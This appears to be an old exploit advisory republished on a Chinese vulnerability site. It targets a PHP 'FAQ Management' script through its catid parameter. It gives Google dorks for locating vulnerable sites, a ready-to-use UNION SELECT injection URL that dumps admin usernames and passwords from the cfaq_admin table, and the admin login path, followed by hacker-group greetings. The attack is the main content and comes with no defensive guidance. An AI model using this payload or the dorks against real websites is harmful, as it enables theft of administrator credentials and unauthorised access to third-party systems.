|___________________________________________________| | | FAQ Management (catid) Remote SQL Injection Vulnerability | |___________________________________________________ |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangel_g85[at]Yahoo[DoT]com | | | |___________________________________________________ | | | | script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80 | | DorK : inurl:cfaq/index.php?catid= | | DorK : inurl:index.php?catid= |___________________________________________________| Exploit: www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin-- AdmiN LoGiN : www.[target].com/Script//admin.php ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab |______________________________________________________________________ Im IRAQi | Im TrYaG I
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论